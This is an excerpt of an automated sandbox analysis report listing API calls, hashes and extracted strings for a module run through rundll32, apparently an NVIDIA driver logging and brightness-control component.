                                                                    • Instruction Fuzzy Hash: AF313A32B16A85AAEB20DF35D8407E833A5FB48788F444035DA5E87B44DF3CE656C754
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CastDeallocateDynamicExceptionThrowstd::_std::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 3778945295-0
                                                                    • Opcode ID: 7e8cf4fd689e27e40ec3149a9b23803f5aaded3899b559f1797ed71fe024f5ff
                                                                    • Instruction ID: 33ed3d14e36ca99a81c2f079820001c1f5b45e39316d4de943033c897f19a5b8
                                                                    • Opcode Fuzzy Hash: 7e8cf4fd689e27e40ec3149a9b23803f5aaded3899b559f1797ed71fe024f5ff
                                                                    • Instruction Fuzzy Hash: 2331BC72A1AA41A2EF14CF20E0003B863A1FB94BC4F444836DA6E0779DDF3CD859C764
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_std::locale::_$LocimpLocimp::_LocinfoLockitLockit::~_New_Yarn$GetcvtInitLocinfo::_Locinfo::~_Setgloballocale
                                                                    • String ID:
                                                                    • API String ID: 1900380900-0
                                                                    • Opcode ID: c1beaac3b4cfa616bdd29feecd7804cac1546bf69316845ad3150be0026fdecc
                                                                    • Instruction ID: 1d9da260569bcbd864073547ffef9593c7451454e4929f07eb689abce37378b5
                                                                    • Opcode Fuzzy Hash: c1beaac3b4cfa616bdd29feecd7804cac1546bf69316845ad3150be0026fdecc
                                                                    • Instruction Fuzzy Hash: 76319E31A0AB82E6EB50DB51E44427AB3A0FF84BE0F044135DA6D47B95EF3CE4658328
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionFreeInfoLibraryLoadLocalMaskVerifyVersion
                                                                    • String ID:
                                                                    • API String ID: 3996897175-0
                                                                    • Opcode ID: 7e5fed11087c4326b1762b0ef82043d9a06b0ff3c383ee0b1bfba45b1b089046
                                                                    • Instruction ID: 0678750c5ee2cb682fd509dcefd710a3c9f91dcb283413b1ab1633fcf3733783
                                                                    • Opcode Fuzzy Hash: 7e5fed11087c4326b1762b0ef82043d9a06b0ff3c383ee0b1bfba45b1b089046
                                                                    • Instruction Fuzzy Hash: 77210832B1A642EAFF24DB75E8052B57290EF88BC4F044034DA0D87795EF3CE6558B68
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: LockitLockit::~_std::_$ExceptionThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 2856977306-0
                                                                    • Opcode ID: ecaaf9cd2f149443c18d5738186d43b1eb30e9db4d2f3bac65fca4f3f16b81f2
                                                                    • Instruction ID: 9faf68c0d878837a5d604dbc4cddaaea5a99ca0b932c378ca79e9970e2dd4003
                                                                    • Opcode Fuzzy Hash: ecaaf9cd2f149443c18d5738186d43b1eb30e9db4d2f3bac65fca4f3f16b81f2
                                                                    • Instruction Fuzzy Hash: 12314B62A0EA42A2FA15EB15E4400B86761EF94BE4F580231D66D477A5EF3CE8598328
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 93e080f88ed689211b9ce7ba41fa0513fdcfe4d07710046eda0ed6fffc96e744
                                                                    • Instruction ID: 501b9be97b13b1048da7455edf60b81ca6179d6fa604805bc6735885884081f9
                                                                    • Opcode Fuzzy Hash: 93e080f88ed689211b9ce7ba41fa0513fdcfe4d07710046eda0ed6fffc96e744
                                                                    • Instruction Fuzzy Hash: AF2181B6B16A8194EF148E12D2401BD7321FB84FC4F24E032DA6D0BB59CF2CD899C304
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 3c25c5139425b86a69570f3ea7bfe5f9e35514b2fd4d6475dddec9d8463ea4d5
                                                                    • Instruction ID: a3aee414e32e9e444ec31bcd03afe77f738e53271e4cc4d6c4276915251da715
                                                                    • Opcode Fuzzy Hash: 3c25c5139425b86a69570f3ea7bfe5f9e35514b2fd4d6475dddec9d8463ea4d5
                                                                    • Instruction Fuzzy Hash: 8A21A1B6B1AA85A4EF14CE12D1802BD6321FB84FC4F14D031EAAE07B59DF2DD889C354
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Locinfostd::_$GetctypeGetcvtLocinfo::_Locinfo::~_
                                                                    • String ID:
                                                                    • API String ID: 2826301415-0
                                                                    • Opcode ID: 1e99d4342cd29dba36445c3b1607530a25047ece4bcb5873c18625d63b8535b3
                                                                    • Instruction ID: 36b86b2b2426bfa6068bd6051e55250d75bfbb3e22dfb3549850b543bf813e99
                                                                    • Opcode Fuzzy Hash: 1e99d4342cd29dba36445c3b1607530a25047ece4bcb5873c18625d63b8535b3
                                                                    • Instruction Fuzzy Hash: 00217F22A0AB8592EB20CF28D4013A97770FB98BD4F409335DAAD536A6EF3CD595C750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3629628435-0
                                                                    • Opcode ID: d4961eedb22df2be85cba4189b959a7d20de85ac4467c504b93b6443318c4265
                                                                    • Instruction ID: 11b5ec630f0a22b4ab9aada274af5f91a5100c8bf3e1eac911efd7a6d1884036
                                                                    • Opcode Fuzzy Hash: d4961eedb22df2be85cba4189b959a7d20de85ac4467c504b93b6443318c4265
                                                                    • Instruction Fuzzy Hash: B011513570D641D1EB24DB21E48426A73A1FB88BD0F444235DDAD47798DF3CE509CB14
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionMask$InfoVerifyVersion
                                                                    • String ID:
                                                                    • API String ID: 2793162063-0
                                                                    • Opcode ID: 99230b27dbe4b2c95b5bed9331070829a79ef9e9bc114238ee211ec093b0693d
                                                                    • Instruction ID: 593cceba8c52b38b8db63626ba07e1d1763f5bf0589e29b88ce3531657f482e5
                                                                    • Opcode Fuzzy Hash: 99230b27dbe4b2c95b5bed9331070829a79ef9e9bc114238ee211ec093b0693d
                                                                    • Instruction Fuzzy Hash: 45119132605B41CAD720CF70E8413EAB3A0FB88B88F044134EA8D4B718EF3CD5588B54
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D68809), ref: 00007FF8A8D68777
                                                                    • HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D68809), ref: 00007FF8A8D68788
                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8A8D687A0
                                                                    • throw_exception.LIBCPMT ref: 00007FF8A8D687A9
                                                                      • Part of subcall function 00007FF8A8D3C8D0: enable_error_info.LIBCPMT ref: 00007FF8A8D3C8EA
                                                                      • Part of subcall function 00007FF8A8D3C8D0: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D3C909
                                                                      • Part of subcall function 00007FF8A8D3C8D0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D2DA0C), ref: 00007FF8A8D3C927
                                                                      • Part of subcall function 00007FF8A8D3C8D0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FF8A8D2DA0C), ref: 00007FF8A8D3C938
                                                                      • Part of subcall function 00007FF8A8D3C8D0: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8A8D3C950
                                                                      • Part of subcall function 00007FF8A8D3C8D0: throw_exception.LIBCPMT ref: 00007FF8A8D3C959
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcessstd::bad_alloc::bad_allocthrow_exception$ExceptionThrowenable_error_info
                                                                    • String ID:
                                                                    • API String ID: 2554138254-0
                                                                    • Opcode ID: 62e3ad041dfcc6aefaaf70c5f66321e6d2c8053afacea2e9eb2edb1585a4e4ce
                                                                    • Instruction ID: bb711ab1b377e8eff58fefb9c7b69039db063deebd1fedbeccaf29ccd555e191
                                                                    • Opcode Fuzzy Hash: 62e3ad041dfcc6aefaaf70c5f66321e6d2c8053afacea2e9eb2edb1585a4e4ce
                                                                    • Instruction Fuzzy Hash: C5018832A0AB8191EB10DF25B9001696370FB997E4F449334EAAD43796FF7CE1A4C714
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocExceptionProcessThrowenable_error_infostd::bad_alloc::bad_allocthrow_exception
                                                                    • String ID:
                                                                    • API String ID: 567531190-0
                                                                    • Opcode ID: 01e0b1f7d15ae3e205be57a387aae64765740c4bca03fb4cb3ff0d67c3f455c9
                                                                    • Instruction ID: 8a79c22a9c91f157aa5e4d6fc83f95cca036c184d34c60d1e6ec382f556eb240
                                                                    • Opcode Fuzzy Hash: 01e0b1f7d15ae3e205be57a387aae64765740c4bca03fb4cb3ff0d67c3f455c9
                                                                    • Instruction Fuzzy Hash: CBF0363260BB4191EB109F65F80051963A4FB88BF4F544234DAAD43795FF7CD154C714
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D15270: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A8D152DF
                                                                      • Part of subcall function 00007FF8A8D15270: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A8D15394
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF8A8D27F43
                                                                      • Part of subcall function 00007FF8A8D9CA10: std::ios_base::_Tidy.LIBCPMT ref: 00007FF8A8D9CA35
                                                                    Strings
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D278B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: LockitLockit::~_std::_std::ios_base::_$Ios_base_dtorTidy
                                                                    • String ID: c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h
                                                                    • API String ID: 1721638112-3002699068
                                                                    • Opcode ID: b96285b4551687ba9a6acca6d4b0652b2b1cff6adee2ddd95c6eb57c41b97d3b
                                                                    • Instruction ID: 07db2decc8052232d1af27b25ab23533e80a098b7c166ae2c567619ebd07d777
                                                                    • Opcode Fuzzy Hash: b96285b4551687ba9a6acca6d4b0652b2b1cff6adee2ddd95c6eb57c41b97d3b
                                                                    • Instruction Fuzzy Hash: 85125A72A0AA86A6DF20DF25D8942AD6361FB84BC4F448122DE6E477A5EF3CD509C314
                                                                    APIs
                                                                    • std::locale::_Init.LIBCPMT ref: 00007FF8A8D031AB
                                                                      • Part of subcall function 00007FF8A8D9B360: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00007FF8A8D9B395
                                                                      • Part of subcall function 00007FF8A8D9B360: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF8A8D9B3A0
                                                                      • Part of subcall function 00007FF8A8D9B360: _Yarn.LIBCPMT ref: 00007FF8A8D9B3B7
                                                                      • Part of subcall function 00007FF8A8D9B360: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF8A8D9B404
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::locale::_$InitLocimpLocimp::_LockitLockit::~_New_SetgloballocaleYarnstd::_
                                                                    • String ID: class$const
                                                                    • API String ID: 1441820753-3992238299
                                                                    • Opcode ID: 1878a3f0d5078fb0a05ebda721c5d5a39939ebdb12e0501878fa442cac1c30aa
                                                                    • Instruction ID: 7bc6172af267cb1122297c71b7ae80ff9ff41fb406e703942473336ba0795e92
                                                                    • Opcode Fuzzy Hash: 1878a3f0d5078fb0a05ebda721c5d5a39939ebdb12e0501878fa442cac1c30aa
                                                                    • Instruction Fuzzy Hash: FA81D522B0BA45A5EB14DFA6D4001BC2371EB49BC8F844532DA2F07784DF7CE65AC369
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_
                                                                    • String ID: map/set<T> too long$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 909987262-3918231815
                                                                    • Opcode ID: 5b633b0ad264ce31a833bf02233dd9e486a98662492c48b28d3cf40de160dccd
                                                                    • Instruction ID: d22250cbac1f24f17aa0789c9e95cf77cc8a3370041efc9f85128322999baed3
                                                                    • Opcode Fuzzy Hash: 5b633b0ad264ce31a833bf02233dd9e486a98662492c48b28d3cf40de160dccd
                                                                    • Instruction Fuzzy Hash: A391247360AB88D0DB18CB19D08012CBBA5F794F94B65D42ACBAD073B4EF79D8A5C354
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: *
                                                                    • API String ID: 3215553584-163128923
                                                                    • Opcode ID: ffb71dcfec2fdb1fba3e49d443df1eba83977a9d0cdf083cb99d37a18518271c
                                                                    • Instruction ID: 9ef7dfa4478f807bcae0fc4aff1d61e66514bc9f77a46ba09af24735f391eb5f
                                                                    • Opcode Fuzzy Hash: ffb71dcfec2fdb1fba3e49d443df1eba83977a9d0cdf083cb99d37a18518271c
                                                                    • Instruction Fuzzy Hash: 4E71C8F290A612D6EB688F3A845403C3BA0FB45BD8F241135DB6E43294DF38E489D738
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: wcsftime
                                                                    • String ID: %Y-%m-%dT%H:%M:%S$NGUgNGMgNTMgMzEgMmUgMzA
                                                                    • API String ID: 2902305603-1341811953
                                                                    • Opcode ID: f29c5a4e593acd43bef6f4edfe64a28282b63c8cd4e63881856728f5847b26e3
                                                                    • Instruction ID: 34e1cb395363160578021e5c78b1f24b885afbaf03422f7b0b83ed201d843355
                                                                    • Opcode Fuzzy Hash: f29c5a4e593acd43bef6f4edfe64a28282b63c8cd4e63881856728f5847b26e3
                                                                    • Instruction Fuzzy Hash: 8351E361E0E686A5FB20DB25E4503B96750FF90BD4F444131DEAD83696EF3CE409C728
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID: .log
                                                                    • API String ID: 3498533004-299349702
                                                                    • Opcode ID: 55d1a9028f26af799bb06fc40ccd591269aa111893101cd608a499a98079780f
                                                                    • Instruction ID: 9b6c0eb4df05f102696e0a0612465498d399c53969b3d6005264a8bb549d6da7
                                                                    • Opcode Fuzzy Hash: 55d1a9028f26af799bb06fc40ccd591269aa111893101cd608a499a98079780f
                                                                    • Instruction Fuzzy Hash: C441E032606B02A6EB10DF31D4942AC23B0FB45BD8F406235DA2E5BB95DF3DE529C318
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                     • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: WmiBrightnessControl.cpp
                                                                    • API String ID: 1323251999-137989277
                                                                    • Opcode ID: 5683d2e524f9351041a721a0c04e413ec95e80fa3b52c9a7dfb8d9ba8b9472aa
                                                                    • Instruction ID: 59dab586b458b14b0f2ce7ea2e02025b3aa5b3b124d06b04fa505e2eb1f10eea
                                                                    • Opcode Fuzzy Hash: 5683d2e524f9351041a721a0c04e413ec95e80fa3b52c9a7dfb8d9ba8b9472aa
